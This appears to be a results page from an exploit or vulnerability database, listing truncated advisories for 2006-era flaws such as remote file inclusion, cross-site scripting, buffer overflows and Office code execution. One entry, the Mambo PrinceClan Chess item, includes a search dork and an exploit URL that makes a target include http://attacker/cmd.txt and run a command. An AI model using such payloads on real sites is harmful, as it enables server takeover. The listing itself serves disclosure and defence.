2026 matches found
Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion
Buzlas 2006-1 Full - ArchiveTopic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...
CVE-2006-4694
Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and...
CVE-2006-4990
CVE-2006-4990 describes PHP remote file inclusion vulnerabilities in PhotoPost 4.0–4.6 where an attacker can execute arbitrary PHP code by supplying a URL to the PP_PATH parameter across multiple PHP scripts (e.g., zipndownload.php and others). The issue enables code execution via network access ...
e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting
source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may levearge this issue to have arbitrary script code execute in the browser of an unsuspecting user i...
Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion
pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
/ $Id: raptorprctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ raptorprctl2.c - Linux 2.6.x suiddumpable2 logrotate Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of...
Microsoft Excel COLINFO Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel LABEL Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Offic...
Microsoft Excel OBJECT Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users. A proof-of-concept malicious code named 'Trojan.Hongmosa' is...
Directory traversal
Unspecified vulnerability in pinball 0.3.1 allows local users to gain privileges via unknown attack vectors that cause pinball to load plugins from an attacker-controlled directory while operating at raised privileges...
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting source: https://www.securityfocus.com/bid/18449/info Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...
Manic Web MWGuest 2.1 - MWguest.php HTML Injection
Manic Web MWGuest 2.1 - MWguest.php HTML Injection source: https://www.securityfocus.com/bid/17630/info MWGuest is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HT...
PHPWebGallery 1.4.1 - picture.php Cross-Site Scripting
PHPWebGallery 1.4.1 - picture.php Cross-Site Scripting source: https://www.securityfocus.com/bid/17421/info PHPWebGallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may...
Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities
Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/17406/info Bitweaver CMS is prone to multiple cross-site scripting vulnerabilities. Thess issues are due to a failure in the application to properly sanitize user-supplied input. An attacke...
UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1)
source: https://www.securityfocus.com/bid/17378/info UltraVNC is susceptible to multiple error-logging remote buffer-overflow vulnerabilities. These issues are due to the application's failure to properly bounds-check user-supplied input before copying it to insufficiently sized memory buffers. A...
CVE-2006-1244
Unspecified vulnerability in certain versions of xpdf after 3.00, as used in various products including a pdfkit.framework, b gpdf, c pdftohtml, and d libextractor, has unknown impact and user-assisted attack vectors, possibly involving errors in 1 gmem.c, 2 SplashXPathScanner.cc, 3 JBIG2Stream.c...
ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload
ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload source: https://www.securityfocus.com/bid/16594/info ImageVue is prone to multiple vulnerabilities, including unauthorized uploading of files with arbitrary extensions, authentication bypass, information disclosure, and content...
Buffer overflow
Buffer overflow in termsh on SCO OpenServer 5.0.7 allows remote attackers to execute arbitrary code via a long -o command line argument. NOTE: this is probably a different vulnerability than CVE-2005-0351 since it involves a distinct attack vector...